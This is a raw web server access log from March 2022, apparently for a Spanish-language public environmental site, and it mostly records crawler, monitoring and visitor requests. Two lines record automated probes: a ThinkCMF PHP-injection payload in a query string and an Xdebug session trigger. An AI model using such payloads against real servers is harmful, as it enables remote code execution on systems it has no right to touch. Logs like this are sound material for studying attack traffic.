66.249.70.45 - - [21/Mar/2022:13:47:06 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:13:47:11 -0500] "HEAD / HTTP/1.1" 200 -
45.146.165.37 - - [21/Mar/2022:13:48:33 -0500] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 319
40.77.190.249 - - [21/Mar/2022:13:49:37 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.189.210 - - [21/Mar/2022:13:49:37 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.189.78 - - [21/Mar/2022:13:49:37 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
216.245.221.92 - - [21/Mar/2022:13:52:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:13:53:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115788
66.220.149.13 - - [21/Mar/2022:13:54:49 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
216.245.221.92 - - [21/Mar/2022:13:57:11 -0500] "HEAD / HTTP/1.1" 200 -
80.82.77.33 - - [21/Mar/2022:13:57:59 -0500] "GET / HTTP/1.1" 200 319
191.96.150.174 - - [21/Mar/2022:13:58:03 -0500] "GET / HTTP/1.1" 200 319
80.82.77.33 - - [21/Mar/2022:13:58:05 -0500] "GET /sitemap.xml HTTP/1.1" 404 1018
80.82.77.33 - - [21/Mar/2022:13:58:05 -0500] "GET /.well-known/security.txt HTTP/1.1" 404 1018
80.82.77.33 - - [21/Mar/2022:13:58:06 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
35.233.62.116 - - [21/Mar/2022:13:58:56 -0500] "GET / HTTP/1.1" 200 319
207.46.13.209 - - [21/Mar/2022:14:00:16 -0500] "GET /bla/resoluciones/resoluciones%202021/4498.pdf HTTP/1.1" 200 361882
191.102.117.217 - - [21/Mar/2022:14:01:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2280.pdf HTTP/1.1" 200 995728
191.102.117.217 - - [21/Mar/2022:14:01:34 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [21/Mar/2022:14:02:11 -0500] "HEAD / HTTP/1.1" 200 -
186.80.59.111 - - [21/Mar/2022:14:04:09 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2001%2F HTTP/1.1" 200 24983
186.80.59.111 - - [21/Mar/2022:14:04:09 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
66.249.70.47 - - [21/Mar/2022:14:05:09 -0500] "-" 408 -
191.96.150.174 - - [21/Mar/2022:14:06:49 -0500] "GET / HTTP/1.1" 200 319
45.146.165.37 - - [21/Mar/2022:14:06:51 -0500] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 319
64.31.49.110 - - [21/Mar/2022:14:07:04 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Mar/2022:14:07:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:14:06:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115773
207.46.13.186 - - [21/Mar/2022:14:07:40 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 80505
199.16.157.181 - - [21/Mar/2022:14:09:48 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
199.16.157.182 - - [21/Mar/2022:14:09:49 -0500] "GET /quieres-saber-como-ahorrar-energia-en-tu-empresa-secretaria-de-ambiente-lanza-guia-que-te-ayudara.html HTTP/1.1" 200 998
216.245.221.92 - - [21/Mar/2022:14:12:11 -0500] "HEAD / HTTP/1.1" 200 -
190.26.150.116 - - [21/Mar/2022:14:13:15 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.26.150.116 - - [21/Mar/2022:14:13:16 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.26.150.116 - - [21/Mar/2022:14:13:16 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.70.45 - - [21/Mar/2022:14:16:15 -0500] "-" 408 -
